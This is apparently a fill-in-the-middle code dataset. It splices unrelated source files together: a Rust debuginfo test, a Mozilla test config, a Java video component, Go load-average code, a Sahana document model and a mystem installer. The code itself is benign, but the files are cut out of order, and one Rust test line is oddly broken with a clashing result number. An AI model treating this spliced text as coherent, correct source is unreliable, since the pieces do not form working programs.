gdb-check:$14 = 3.5 // === LLDB TESTS ================================================================================== // lldb-command:type format add -f decimal char // lldb-command:type format add -f decimal 'unsigned char' // lldb-command:run // lldb-command:print *bool_ref // lldb-check:[...]$0 = true // lldb-command:print *int_ref // lldb-check:[...]$1 = -1 // d ebugger:print *char_ref // c heck:[...]$3 = 97 // lldb-command:print *i8_ref // lldb-check:[...]$2 = 68 // lldb-command:print *i16_ref // lldb-check:[...]$3 = -16 // lldb-command:print *i32_ref // lldb-check:[...]$4 = -32 // lldb-command:print *i64_ref // lldb-check:[...]$5 = -64 // lldb-command:print *uint_ref // lldb-check:[...]$6 = 1 // lldb-command:print *u8_ref // lldb-check:[...]$7 = 100 // lldb-command:print *u16_ref // lldb-check:[...]$8 = 16 // lldb-command:print *u32_ref // lldb-check:[...]$9 = 32 // lldb-command:print *u64_ref // lldb-check:[...]$10 = 64 // lldb-command:print *f32_ref // lldb-check:[...]$11 = 2.5 // lldb-command:print *f64_ref // lldb-check:[...]$12 = 3.5 #![allow(unused_variables)]<|fim▁hole|> fn main() { let bool_box: Box<bool> = box true; let bool_ref: &bool = &*bool_box; let int_box: Box<int> = box -1; let int_ref: &int = &*int_box; let char_box: Box<char> = box 'a'; let char_ref: &char = &*char_box; let i8_box: Box<i8> = box 68; let i8_ref: &i8 = &*i8_box; let i16_box: Box<i16> = box -16; let i16_ref: &i16 = &*i16_box; let i32_box: Box<i32> = box -32; let i32_ref: &i32 = &*i32_box; let i64_box: Box<i64> = box -64; let i64_ref: &i64 = &*i64_box; let uint_box: Box<uint> = box 1; let uint_ref: &uint = &*uint_box; let u8_box: Box<u8> = box 100; let u8_ref: &u8 = &*u8_box; let u16_box: Box<u16> = box 16; let u16_ref: &u16 = &*u16_box; let u32_box: Box<u32> = box 32; let u32_ref: &u32 = &*u32_box; let u64_box: Box<u64> = box 64; let u64_ref: &u64 = &*u64_box; let f32_box: Box<f32> = box 2.5; let f32_ref: &f32 = &*f32_box; let f64_box: Box<f64> = box 3.5; let f64_ref: &f64 = &*f64_box; zzz(); // #break } 
fn zzz() {()}<|fim▁end|>
#![feature(box_syntax)] #![omit_gdb_pretty_printer_section]
<|file_name|>prod_config_windows.py<|end_file_name|><|fim▁begin|># ***** BEGIN LICENSE BLOCK ***** # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. # ***** END LICENSE BLOCK ***** # This is a template config file for web-platform-tests test. import os import sys config = { <|fim▁hole|> "--config=%(test_path)s/wptrunner.ini", "--ca-cert-path=%(test_path)s/certs/cacert.pem", "--host-key-path=%(test_path)s/certs/web-platform.test.key", "--host-cert-path=%(test_path)s/certs/web-platform.test.pem", "--certutil-binary=%(test_install_path)s/bin/certutil", ], "exes": { 'python': sys.executable, 'virtualenv': [sys.executable, 'c:/mozilla-build/buildbotve/virtualenv.py'], 'hg': 'c:/mozilla-build/hg/hg', 'mozinstall': ['%s/build/venv/scripts/python' % os.getcwd(), '%s/build/venv/scripts/mozinstall-script.py' % os.getcwd()], 'tooltool.py': [sys.executable, 'C:/mozilla-build/tooltool.py'], }, "find_links": [ "http://pypi.pvt.build.mozilla.org/pub", "http://pypi.pub.build.mozilla.org/pub", ], "pip_index": False, "buildbot_json_path": "buildprops.json", "default_blob_upload_servers": [ "https://blobupload.elasticbeanstalk.com", ], "blob_uploader_auth_file" : os.path.join(os.getcwd(), "oauth.txt"), "download_minidump_stackwalk": True, }<|fim▁end|>
"options": [ "--prefs-root=%(test_path)s/prefs", "--processes=1",
<|file_name|>WVideo.java<|end_file_name|><|fim▁begin|>package com.github.bordertech.wcomponents; import com.github.bordertech.wcomponents.util.Util; import java.util.Arrays; import java.util.List; import java.util.Map; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; /** * WVideo is used to display video content on the client. * * @author Yiannis Paschalidis * @since 1.0.0 */ public class WVideo extends AbstractWComponent implements Targetable, AjaxTarget, Disableable { /** * The logger instance for this class. */ private static final Log LOG = LogFactory.getLog(WVideo.class); <|fim▁hole|> /** * This request parameter is used to determine which video clip to serve up. */ private static final String VIDEO_INDEX_REQUEST_PARAM_KEY = "WVideo.videoIndex"; /** * This request parameter is used to determine which track to serve up. */ private static final String TRACK_INDEX_REQUEST_PARAM_KEY = "WVideo.trackIndex"; /** * This request parameter is used to request the poster image. */ private static final String POSTER_REQUEST_PARAM_KEY = "WVideo.poster"; /** * This is used to indicate whether pre-loading of content should occur before the clip is played. */ public enum Preload { /** * Do not pre-load any data. */ NONE, /** * Preload meta-data only. */ META_DATA, /** * Let the client determine what to load. */ AUTO } /** * This is used to indicate which playback controls to display for the video. * * <p> * <strong>Note:</strong> * Advancements in video support in clients since this API was first implemented means that most of this is now * redundant. Under most circumstances the UI will display their native video controls. Where a particular WVideo * does not have any source which is able to be played by the client then links to all sources will be provided. * This enum is not worthless as the values NONE and PLAY_PAUSE are used to turn off native video controls in the * client. The value NONE however causes major problems and is incompatible with autoplay for a11y reasons so it * basically makes the media worthless. This enum may be replaced in the future with a simple boolean to trigger * native controls or play/pause only (see https://github.com/BorderTech/wcomponents/issues/503). * </p> */ public enum Controls { /** * Do not display any controls: not recommended. May be incompatible with any of {@link #isAutoplay()} == true, * {@link #isMuted()} == true or {@link #isLoop()} == true. If this value is set then the WVideo control * <strong>MAY NOT WORK AT ALL</strong>. * @deprecated since 1.1.1 as this is incompatible with WCAG requirements. */ NONE, /** * Display all controls. * @deprecated since 1.1.1 as themes use native video controls. */ ALL, /** * A combined play/pause button. */ PLAY_PAUSE, /** * Displays the "default" set of controls for the theme. * @deprecated since 1.1.1 as themes use native video controls. */ DEFAULT, /** * Displays the client's native set of controls. */ NATIVE } /** * Creates a WVideo with no video clips. Video clips must be added later by calling one of the setVideo(...) * methods. */ public WVideo() { } /** * Creates a WVideo with the given video clip. * * @param video the video clip. */ public WVideo(final Video video) { this(new Video[]{video}); } /** * <p> * Creates a WVideo with the given static content. This is provided as a convenience method for when the video file * is included as static content in the class path rather than in the web application's resources. 
* </p> * <p> * The mime type for the video clip is looked up from the "mimeType.*" mapping configuration parameters using the * resource's file extension. * </p> * * @param resource the resource path to the video file. */ public WVideo(final String resource) { this(new VideoResource(resource)); } /** * Creates a WVideo with the given video clip in multiple formats. The client will try to load the first video clip, * and if it fails or isn't supported, it will move on to the next video clip. Only the first clip which can be * played on the client will be used. * * @param video multiple formats for the same the video clip. */ public WVideo(final Video[] video) { setVideo(video); } /** * Sets the video clip. * * @param video the video clip. */ public void setVideo(final Video video) { setVideo(new Video[]{video}); } /** * Sets the video clip in multiple formats. The client will try to load the first video clip, and if it fails or * isn't supported, it will move on to the next video clip. Only the first clip which can be played on the client * will be used. * * @param video multiple formats for the same the video clip. */ public void setVideo(final Video[] video) { List<Video> list = video == null ? null : Arrays.asList(video); getOrCreateComponentModel().video = list; } /** * Retrieves the video clips associated with this WVideo. * * @return the video clips, may be null. */ public Video[] getVideo() { List<Video> list = getComponentModel().video; return list == null ? null : list.toArray(new Video[]{}); } /** * Indicates whether the video component is disabled. * * @return true if the component is disabled, otherwise false. */ @Override public boolean isDisabled() { return isFlagSet(ComponentModel.DISABLED_FLAG); } /** * Sets whether the video component is disabled. * * @param disabled if true, the component is disabled. If false, it is enabled. */ @Override public void setDisabled(final boolean disabled) { setFlag(ComponentModel.DISABLED_FLAG, disabled); } /** * @return true if the clip should start playing automatically, false for a manual start. */ public boolean isAutoplay() { return getComponentModel().autoplay; } /** * Sets whether the clip should play automatically. * * @param autoplay true to start playing automatically, false for a manual start. */ public void setAutoplay(final boolean autoplay) { getOrCreateComponentModel().autoplay = autoplay; } /** * @return the media group name. */ public String getMediaGroup() { return getComponentModel().mediaGroup; } /** * Sets the media group. * * @param mediaGroup The media group name. */ public void setMediaGroup(final String mediaGroup) { getOrCreateComponentModel().mediaGroup = mediaGroup; } /** * Indicates whether the video clip playback should loop. * * @return true to loop, false to stop at the end. */ public boolean isLoop() { return getComponentModel().loop; } /** * Sets whether the video clip playback should loop or stop at the end. * * @param loop true to loop, false to stop at the end. */ public void setLoop(final boolean loop) { getOrCreateComponentModel().loop = loop; } /** * Indicates whether the video's audio should initially be muted. * * @return true if muted, false otherwise. */ public boolean isMuted() { return getComponentModel().muted; } /** * Sets whether the video's audio should initially be muted. * * @param muted true to mute the audio, false to play normally. */ public void setMuted(final boolean muted) { getOrCreateComponentModel().muted = muted; } /** * Indicates which playback controls (e.g. 
stop/start/pause) to display on the video component. * * @return the playback controls to display. */ public Controls getControls() { return getComponentModel().controls; } /** * Sets which playback controls (e.g. stop/start/pause) to display on the video component. The values of * {@link Controls#NONE} and {@link Controls#ALL} take precedence over all other values. Passing a null or empty set * of controls will cause the client's default set of controls to be used. * * @param controls the playback controls to display. */ public void setControls(final Controls controls) { getOrCreateComponentModel().controls = controls; } /** * Indicates how pre-loading of content should occur before the clip is played. * * @return the pre-loading mode. */ public Preload getPreload() { return getComponentModel().preload; } /** * Sets how pre-loading of content should occur before the clip is played. * * @param preload the pre-loading mode. */ public void setPreload(final Preload preload) { getOrCreateComponentModel().preload = preload; } /** * @return alternative text to display when the video clip can not be played. */ public String getAltText() { return getComponentModel().altText; } /** * Sets the alternative text to display when the video clip can not be played. * * @param altText the text to set. */ public void setAltText(final String altText) { getOrCreateComponentModel().altText = altText; } /** * @return the width of the video playback region on the client, in pixels. */ public int getWidth() { return getComponentModel().width; } /** * Sets the width of the video playback region on the client. * * @param width the width of the video playback region, in pixels. */ public void setWidth(final int width) { getOrCreateComponentModel().width = width; } /** * @return the height of the video playback region on the client, in pixels. */ public int getHeight() { return getComponentModel().height; } /** * Sets the height of the video playback region on the client. * * @param height the height of the video playback region, in pixels. */ public void setHeight(final int height) { getOrCreateComponentModel().height = height; } /** * Retrieves the default poster image. The poster image is displayed by the client when the video is not playing. * * @return the default poster image. */ public Image getPoster() { return getComponentModel().poster; } /** * Sets the default poster image. The poster image is displayed by the client when the video is not playing. * * @param poster the default poster image. */ public void setPoster(final Image poster) { getOrCreateComponentModel().poster = poster; } /** * Sets the tracks for the video. The tracks are used to provide additional information relating to the video, for * example subtitles. * * @param tracks additional tracks relating to the video. */ public void setTracks(final Track[] tracks) { List<Track> list = tracks == null ? null : Arrays.asList(tracks); getOrCreateComponentModel().tracks = list; } /** * Retrieves additional tracks associated with the video. The tracks provide additional information relating to the * video, for example subtitles. * * @return the video clips, may be null. */ public Track[] getTracks() { List<Track> list = getComponentModel().tracks; return list == null ? null : list.toArray(new Track[]{}); } /** * Creates dynamic URLs that the video clips can be loaded from. In fact the URL points to the main application * servlet, but includes a non-null for the parameter associated with this WComponent (ie, its label). 
The * handleRequest method below detects this when the browser requests a file. * * @return the urls to load the video files from, or null if there are no clips defined. */ public String[] getVideoUrls() { Video[] video = getVideo(); if (video == null || video.length == 0) { return null; } String[] urls = new String[video.length]; // this variable needs to be set in the portlet environment. String url = getEnvironment().getWServletPath(); Map<String, String> parameters = getBaseParameterMap(); for (int i = 0; i < urls.length; i++) { parameters.put(VIDEO_INDEX_REQUEST_PARAM_KEY, String.valueOf(i)); urls[i] = WebUtilities.getPath(url, parameters, true); } return urls; } /** * Creates dynamic URLs that the video clips can be loaded from. In fact the URL points to the main application * servlet, but includes a non-null for the parameter associated with this WComponent (ie, its label). The * handleRequest method below detects this when the browser requests a file. * * @return the urls to load the video files from, or null if there are no clips defined. */ public String[] getTrackUrls() { Track[] tracks = getTracks(); if (tracks == null || tracks.length == 0) { return null; } String[] urls = new String[tracks.length]; // this variable needs to be set in the portlet environment. String url = getEnvironment().getWServletPath(); Map<String, String> parameters = getBaseParameterMap(); for (int i = 0; i < urls.length; i++) { parameters.put(TRACK_INDEX_REQUEST_PARAM_KEY, String.valueOf(i)); urls[i] = WebUtilities.getPath(url, parameters, true); } return urls; } /** * Creates a dynamic URL that the poster can be loaded from. In fact the URL points to the main application servlet, * but includes a non-null for the parameter associated with this WComponent (ie, its label). The handleRequest * method below detects this when the browser requests a file. * * @return the url to load the poster from, or null if there is no poster defined. */ public String getPosterUrl() { Image poster = getComponentModel().poster; if (poster == null) { return null; } // this variable needs to be set in the portlet environment. String url = getEnvironment().getWServletPath(); Map<String, String> parameters = getBaseParameterMap(); parameters.put(POSTER_REQUEST_PARAM_KEY, "x"); return WebUtilities.getPath(url, parameters, true); } /** * Retrieves the base parameter map for serving content (videos + tracks). * * @return the base map for serving content. */ private Map<String, String> getBaseParameterMap() { Environment env = getEnvironment(); Map<String, String> parameters = env.getHiddenParameters(); parameters.put(Environment.TARGET_ID, getTargetId()); if (Util.empty(getCacheKey())) { // Add some randomness to the URL to prevent caching String random = WebUtilities.generateRandom(); parameters.put(Environment.UNIQUE_RANDOM_PARAM, random); } else { // Remove step counter as not required for cached content parameters.remove(Environment.STEP_VARIABLE); parameters.remove(Environment.SESSION_TOKEN_VARIABLE); // Add the cache key parameters.put(Environment.CONTENT_CACHE_KEY, getCacheKey()); } return parameters; } /** * Override isVisible to also return false if there are no video clips to play. * * @return true if this component is visible in the given context, otherwise false. 
*/ @Override public boolean isVisible() { if (!super.isVisible()) { return false; } Video[] video = getVideo(); return video != null && video.length > 0; } /** * When an video element is rendered to the client, the browser will make a second request to get the video content. * The handleRequest method has been overridden to detect whether the request is the "content fetch" request by * looking for the parameter that we encode in the content url. * * @param request the request being responded to. */ @Override public void handleRequest(final Request request) { super.handleRequest(request); String targ = request.getParameter(Environment.TARGET_ID); boolean contentReqested = (targ != null && targ.equals(getTargetId())); if (contentReqested && request.getParameter(POSTER_REQUEST_PARAM_KEY) != null) { handlePosterRequest(); } if (isDisabled()) { return; } if (contentReqested) { if (request.getParameter(VIDEO_INDEX_REQUEST_PARAM_KEY) != null) { handleVideoRequest(request); } else if (request.getParameter(TRACK_INDEX_REQUEST_PARAM_KEY) != null) { handleTrackRequest(request); } } } /** * Handles a request for the poster. */ private void handlePosterRequest() { Image poster = getComponentModel().poster; if (poster != null) { ContentEscape escape = new ContentEscape(poster); escape.setCacheable(!Util.empty(getCacheKey())); throw escape; } else { LOG.warn("Client requested non-existant poster"); } } /** * Handles a request for a video. * * @param request the request being responded to. */ private void handleVideoRequest(final Request request) { String videoRequested = request.getParameter(VIDEO_INDEX_REQUEST_PARAM_KEY); int videoFileIndex = 0; try { videoFileIndex = Integer.parseInt(videoRequested); } catch (NumberFormatException e) { LOG.error("Failed to parse video index: " + videoFileIndex); } Video[] video = getVideo(); if (video != null && videoFileIndex >= 0 && videoFileIndex < video.length) { ContentEscape escape = new ContentEscape(video[videoFileIndex]); escape.setCacheable(!Util.empty(getCacheKey())); throw escape; } else { LOG.warn("Client requested invalid video clip: " + videoFileIndex); } } /** * Handles a request for an auxillary track. * * @param request the request being responded to. */ private void handleTrackRequest(final Request request) { String trackRequested = request.getParameter(TRACK_INDEX_REQUEST_PARAM_KEY); int trackIndex = 0; try { trackIndex = Integer.parseInt(trackRequested); } catch (NumberFormatException e) { LOG.error("Failed to parse track index: " + trackIndex); } Track[] tracks = getTracks(); if (tracks != null && trackIndex >= 0 && trackIndex < tracks.length) { ContentEscape escape = new ContentEscape(tracks[trackIndex]); escape.setCacheable(!Util.empty(getCacheKey())); throw escape; } else { LOG.warn("Client requested invalid track: " + trackIndex); } } /** * @return the cacheKey */ public String getCacheKey() { return getComponentModel().cacheKey; } /** * @param cacheKey the cacheKey to set. */ public void setCacheKey(final String cacheKey) { getOrCreateComponentModel().cacheKey = cacheKey; } /** * Returns the id to use to target this component. * * @return this component's target id. */ @Override public String getTargetId() { return getId(); } /** * @return a String representation of this component, for debugging purposes. */ @Override public String toString() { String text = getAltText(); return toString(text == null ? 
null : ('"' + text + '"')); } // -------------------------------- // Extrinsic state management /** * Creates a new component model appropriate for this component. * * @return a new VideoModel. */ @Override protected VideoModel newComponentModel() { return new VideoModel(); } /** * {@inheritDoc} */ @Override // For type safety only protected VideoModel getComponentModel() { return (VideoModel) super.getComponentModel(); } /** * {@inheritDoc} */ @Override // For type safety only protected VideoModel getOrCreateComponentModel() { return (VideoModel) super.getOrCreateComponentModel(); } /** * Holds the extrinsic state information of a WVideo. */ public static class VideoModel extends ComponentModel { /** * The various video clips. */ private List<Video> video; /** * Additional tracks relating to the video, e.g. subtitles. */ private List<Track> tracks; /** * The cache key used to control client-side caching. */ private String cacheKey; /** * Indicates whether the video should play immediately after page load. */ private boolean autoplay; /** * Indicates whether playback of the video clip should be looped. */ private boolean loop; /** * Indicates whether audio should initially be muted. */ private boolean muted; /** * Indicates which playback controls to display. */ private Controls controls; /** * Indicates whether pre-loading of content should occur before the clip is played. */ private Preload preload = Preload.NONE; /** * Alternate text to display if the video clip can not be played. */ private String altText; /** * The width of the video playback region on the client, in pixels. */ private int width; /** * The height of the video playback region on the client, in pixels. */ private int height; /** * The poster image is displayed in place of the video, until it is loaded. */ private Image poster; /** * This is used to group related media together, for example to synchronize tracks. */ private String mediaGroup; } }<|fim▁end|>
<|file_name|>load_darwin.go<|end_file_name|><|fim▁begin|>// +build darwin package load import ( "os/exec" "strconv" "strings" "../common" ) func Avg() (*AvgStat, error) { values, err := common.DoSysctrl("vm.loadavg") if err != nil { return nil, err } load1, err := strconv.ParseFloat(values[0], 64) if err != nil { return nil, err } load5, err := strconv.ParseFloat(values[1], 64) if err != nil { return nil, err } load15, err := strconv.ParseFloat(values[2], 64) if err != nil { return nil, err } ret := &AvgStat{ Load1: float64(load1), Load5: float64(load5), Load15: float64(load15), } return ret, nil } // Misc returnes miscellaneous host-wide statistics. // darwin use ps command to get process running/blocked count. // Almost same as FreeBSD implementation, but state is different. // U means 'Uninterruptible Sleep'. func Misc() (*MiscStat, error) { bin, err := exec.LookPath("ps") if err != nil { return nil, err } out, err := invoke.Command(bin, "axo", "state") if err != nil { return nil, err } lines := strings.Split(string(out), "\n")<|fim▁hole|> if strings.Contains(l, "R") { ret.ProcsRunning++ } else if strings.Contains(l, "U") { // uninterruptible sleep == blocked ret.ProcsBlocked++ } } return &ret, nil }<|fim▁end|>
ret := MiscStat{} for _, l := range lines {
<|file_name|>doc.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- """ Sahana Eden Document Library @copyright: 2011-2012 (c) Sahana Software Foundation @license: MIT Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ __all__ = ["S3DocumentLibrary", "doc_image_represent"] import os from gluon import * from gluon.storage import Storage from ..s3 import * # ============================================================================= class S3DocumentLibrary(S3Model): names = ["doc_entity", "doc_document", "doc_image"] def model(self): T = current.T db = current.db s3 = current.response.s3 person_comment = self.pr_person_comment person_id = self.pr_person_id location_id = self.gis_location_id organisation_id = self.org_organisation_id messages = current.messages NONE = messages.NONE UNKNOWN_OPT = messages.UNKNOWN_OPT # Shortcuts add_component = self.add_component configure = self.configure crud_strings = s3.crud_strings define_table = self.define_table super_link = self.super_link # --------------------------------------------------------------------- # Document-referencing entities # entity_types = Storage(asset_asset=T("Asset"), irs_ireport=T("Incident Report"), project_project=T("Project"), project_activity=T("Project Activity"), project_task=T("Task"), hms_hospital=T("Hospital")) tablename = "doc_entity" doc_entity = self.super_entity(tablename, "doc_id", entity_types) # Components add_component("doc_document", doc_entity=self.super_key(doc_entity)) add_component("doc_image", doc_entity=self.super_key(doc_entity)) # --------------------------------------------------------------------- # Documents # tablename = "doc_document" table = define_table(tablename, super_link("site_id", "org_site"), super_link("doc_id", doc_entity), Field("file", "upload", autodelete=True), Field("name", length=128, notnull=True, # Allow Name to be added onvalidation requires = IS_NULL_OR(IS_LENGTH(128)), label=T("Name")), Field("url", label=T("URL"), requires = IS_NULL_OR(IS_URL()), represent = lambda url: \ url and A(url,_href=url) or NONE), person_id(label=T("Author"), comment=person_comment(T("Author"), T("The Author of this Document (optional)"))), organisation_id( widget = S3OrganisationAutocompleteWidget(default_from_profile=True) ), s3_date(label = T("Date Published")), location_id(), s3_comments(), #Field("entered", "boolean", label=T("Entered")), Field("checksum", readable=False, writable=False), *s3_meta_fields()) # Field configuration table.file.represent = lambda file, table=table: \ self.doc_file_represent(file, table) 
#table.location_id.readable = False #table.location_id.writable = False<|fim▁hole|> # _title="%s|%s" % (T("Entered"), # T("Has data from this Reference Document been entered into Sahana?"))) # CRUD Strings ADD_DOCUMENT = T("Add Reference Document") crud_strings[tablename] = Storage( title_create = ADD_DOCUMENT, title_display = T("Document Details"), title_list = T("Documents"), title_update = T("Edit Document"), title_search = T("Search Documents"), subtitle_create = T("Add New Document"), label_list_button = T("List Documents"), label_create_button = ADD_DOCUMENT, label_delete_button = T("Delete Document"), msg_record_created = T("Document added"), msg_record_modified = T("Document updated"), msg_record_deleted = T("Document deleted"), msg_list_empty = T("No Documents found") ) # Search Method? # Resource Configuration configure(tablename, onvalidation=self.document_onvalidation) # --------------------------------------------------------------------- # Images # # @ToDo: Field to determine which is the default image to use for # e.g. a Map popup (like the profile picture) # readable/writable=False except in the cases where-needed # doc_image_type_opts = { 1:T("Photograph"), 2:T("Map"), 3:T("Document Scan"), 99:T("other") } tablename = "doc_image" table = define_table(tablename, super_link("site_id", "org_site"), super_link("pe_id", "pr_pentity"), super_link("doc_id", doc_entity), Field("file", "upload", autodelete=True, requires = IS_NULL_OR( IS_IMAGE(extensions=(s3.IMAGE_EXTENSIONS) )), # upload folder needs to be visible to the download() function as well as the upload uploadfolder = os.path.join(current.request.folder, "uploads", "images")), Field("name", length=128, notnull=True, # Allow Name to be added onvalidation requires = IS_NULL_OR(IS_LENGTH(128)), label=T("Name")), Field("url", label=T("URL"), requires = IS_NULL_OR(IS_URL())), Field("type", "integer", requires = IS_IN_SET(doc_image_type_opts, zero=None), default = 1, label = T("Image Type"), represent = lambda opt: doc_image_type_opts.get(opt, UNKNOWN_OPT)), person_id(label=T("Author")), organisation_id( widget = S3OrganisationAutocompleteWidget(default_from_profile=True) ), location_id(), s3_date(label = T("Date Taken")), s3_comments(), Field("checksum", readable=False, writable=False), *s3_meta_fields()) # Field configuration table.file.represent = doc_image_represent # CRUD Strings ADD_IMAGE = T("Add Photo") crud_strings[tablename] = Storage( title_create = ADD_IMAGE, title_display = T("Photo Details"), title_list = T("Photos"), title_update = T("Edit Photo"), title_search = T("Search Photos"), subtitle_create = T("Add New Photo"), label_list_button = T("List Photos"), label_create_button = ADD_IMAGE, label_delete_button = T("Delete Photo"), msg_record_created = T("Photo added"), msg_record_modified = T("Photo updated"), msg_record_deleted = T("Photo deleted"), msg_list_empty = T("No Photos found")) # Search Method # Resource Configuration configure(tablename, onvalidation=lambda form: \ self.document_onvalidation(form, document=False)) # --------------------------------------------------------------------- # Pass model-global names to response.s3 # return Storage() # ------------------------------------------------------------------------- def defaults(self): """ Safe defaults if the module is disabled """ return Storage() # ------------------------------------------------------------------------- @staticmethod def doc_file_represent(file, table): """ File representation """ if file: return A(table.file.retrieve(file)[0], 
_href=URL(c="default", f="download", args=[file])) else: return current.messages.NONE # ------------------------------------------------------------------------- @staticmethod def document_represent(id): """ Foreign key representation """ if not id: return current.messages.NONE db = current.db table = db.doc_document record = db(table.id == id).select(table.name, limitby=(0, 1)).first() try: return A(record.name, _href = URL(c="doc", f="document", args=[id], extension=""), _target = "blank") except: return current.messages.UNKNOWN_OPT # ------------------------------------------------------------------------- @staticmethod def document_onvalidation(form, document=True): """ Form validation for both, documents and images """ import cgi T = current.T db = current.db vars = form.vars if document: tablename = "doc_document" msg = T("Either file upload or document URL required.") else: tablename = "doc_image" msg = T("Either file upload or image URL required.") table = db[tablename] doc = vars.file url = vars.url if not hasattr(doc, "file"): id = current.request.post_vars.id if id: record = db(table.id == id).select(table.file, limitby=(0, 1)).first() if record: doc = record.file if not hasattr(doc, "file") and not doc and not url: form.errors.file = msg form.errors.url = msg # Do a checksum on the file to see if it's a duplicate if isinstance(doc, cgi.FieldStorage) and doc.filename: f = doc.file vars.checksum = doc_checksum(f.read()) f.seek(0) if not vars.name: vars.name = doc.filename if vars.checksum is not None: # Duplicate allowed if original version is deleted query = ((table.checksum == vars.checksum) & \ (table.deleted == False)) result = db(query).select(table.name, limitby=(0, 1)).first() if result: doc_name = result.name form.errors["file"] = "%s %s" % \ (T("This file already exists on the server as"), doc_name) return # ============================================================================= def doc_image_represent(filename): """ Represent an image as a clickable thumbnail @param filename: name of the image file """ return DIV(A(IMG(_src=URL(c="default", f="download", args=filename), _height=40), _class="zoom", _href=URL(c="default", f="download", args=filename))) # @todo: implement/activate the JavaScript for this: #import uuid #anchor = "zoom-media-image-%s" % uuid.uuid4() #return DIV(A(IMG(_src=URL(c="default", f="download", #args=filename), #_height=40), #_class="zoom", #_href="#%s" % anchor), #DIV(IMG(_src=URL(c="default", f="download", #args=filename), #_width=600), #_id="%s" % anchor, #_class="hide")) # ============================================================================= def doc_checksum(docstr): """ Calculate a checksum for a file """ import hashlib converted = hashlib.sha1(docstr).hexdigest() return converted # END =========================================================================<|fim▁end|>
#table.entered.comment = DIV(_class="tooltip",
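doc_checksum in the row above is just a SHA-1 hex digest, and document_onvalidation compares it against stored checksums to reject re-uploads of the same file; a minimal, self-contained illustration of that idea (the byte strings are invented):

import hashlib

def doc_checksum(docstr):
    """ Calculate a checksum for a file """
    return hashlib.sha1(docstr).hexdigest()

first = doc_checksum(b"same file contents")
second = doc_checksum(b"same file contents")
assert first == second   # a matching checksum is what triggers the "file already exists" error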
<|file_name|>installer.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- import platform import os import sys from .constants import (MYSTEM_BIN, MYSTEM_EXE, MYSTEM_DIR) _TARBALL_URLS = { 'linux': { '32bit': "http://download.cdn.yandex.net/mystem/mystem-3.0-linux3.5-32bit.tar.gz", '64bit': "http://download.cdn.yandex.net/mystem/mystem-3.0-linux3.1-64bit.tar.gz", }, 'darwin': "http://download.cdn.yandex.net/mystem/mystem-3.0-macosx10.8.tar.gz", 'win': { '32bit': "http://download.cdn.yandex.net/mystem/mystem-3.0-win7-32bit.zip", '64bit': "http://download.cdn.yandex.net/mystem/mystem-3.0-win7-64bit.zip", }, 'freebsd': { '64bit': "http://download.cdn.yandex.net/mystem/mystem-3.0-freebsd9.0-64bit.tar.gz", } } def autoinstall(out=sys.stderr): """ Install mystem binary as :py:const:`~pymystem3.constants.MYSTEM_BIN`. Do nothing if already installed.<|fim▁hole|> """ if os.path.isfile(MYSTEM_BIN): return install(out) def install(out=sys.stderr): """ Install mystem binary as :py:const:`~pymystem3.constants.MYSTEM_BIN`. Overwrite if already installed. """ import requests import tempfile url = _get_tarball_url() print("Installing mystem to %s from %s" % (MYSTEM_BIN, url), file=out) if not os.path.isdir(MYSTEM_DIR): os.makedirs(MYSTEM_DIR) tmp_fd, tmp_path = tempfile.mkstemp() try: r = requests.get(url, stream=True) with os.fdopen(tmp_fd, 'wb') as fd: for chunk in r.iter_content(64 * 1024): fd.write(chunk) fd.flush() if url.endswith('.tar.gz'): import tarfile with tarfile.open(tmp_path) as tar: tar.extract(MYSTEM_EXE, MYSTEM_DIR) elif url.endswith('.zip'): import zipfile with zipfile.ZipFile(tmp_path) as zip: zip.extractall(MYSTEM_DIR) else: raise NotImplementedError("Could not install mystem from %s" % url) finally: os.unlink(tmp_path) def _get_on_prefix(kvs, key): for k, v in kvs.items(): if key.startswith(k): return v return None def _get_tarball_url(): bits, _ = platform.architecture() url = _get_on_prefix(_TARBALL_URLS, sys.platform) if url is None: raise NotImplementedError("Your system is not supported. Feel free to report bug or make a pull request.") if isinstance(url, str): return url url = url.get(bits, None) if url is None: raise NotImplementedError("Your system is not supported. Feel free to report bug or make a pull request.") return url<|fim▁end|>
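Per its docstrings, autoinstall() returns immediately when MYSTEM_BIN already exists and otherwise downloads and unpacks the matching mystem build; a typical call site might look like the following (the pymystem3.installer module path is inferred from the docstrings and not shown in this row):

from pymystem3.installer import autoinstall

autoinstall()   # fetches the mystem binary into MYSTEM_BIN only when it is missing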
<|file_name|>AnalysisService.java<|end_file_name|><|fim▁begin|>/* * Licensed to ElasticSearch and Shay Banon under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. ElasticSearch licenses this * file to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.elasticsearch.index.analysis; import com.google.common.collect.ImmutableMap; import org.apache.lucene.analysis.Analyzer; import org.elasticsearch.ElasticSearchIllegalArgumentException; import org.elasticsearch.common.Nullable; import org.elasticsearch.common.Strings; import org.elasticsearch.common.component.CloseableComponent; import org.elasticsearch.common.inject.Inject; import org.elasticsearch.common.settings.ImmutableSettings; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.index.AbstractIndexComponent; import 